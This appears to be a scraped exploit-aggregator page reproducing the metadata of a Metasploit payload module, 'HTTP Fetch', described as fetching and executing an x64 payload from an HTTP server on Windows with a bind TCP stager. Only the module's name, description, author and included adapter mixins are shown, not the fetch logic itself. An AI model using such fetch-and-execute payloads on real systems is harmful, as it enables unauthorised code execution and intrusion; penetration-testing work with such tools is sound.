HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64) exploit

11 months ago 99
BOOK THIS SPACE FOR AD
ARTICLE AD

Share

## https://sploitus.com/exploit?id=MSF:PAYLOAD-CMD-WINDOWS-HTTP-X64-PEINJECT-BIND_TCP_UUID- ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## module MetasploitModule include Msf::Payload::Adapter::Fetch::HTTP include Msf::Payload::Adapter::Fetch::WindowsOptions def initialize(info = {}) super( update_info( info, 'Name' => 'HTTP Fetch', 'Description' => 'Fetch and Execute an x64 payload from an http server', 'Author' => 'Brendan Watters', 'Platform' => 'win', 'Arch' => ARCH_CMD, 'License' => MSF_LICENSE, 'AdaptedArch' => ARCH_X64, 'AdaptedPlatform' => 'win' ) ) end end
Read Entire Article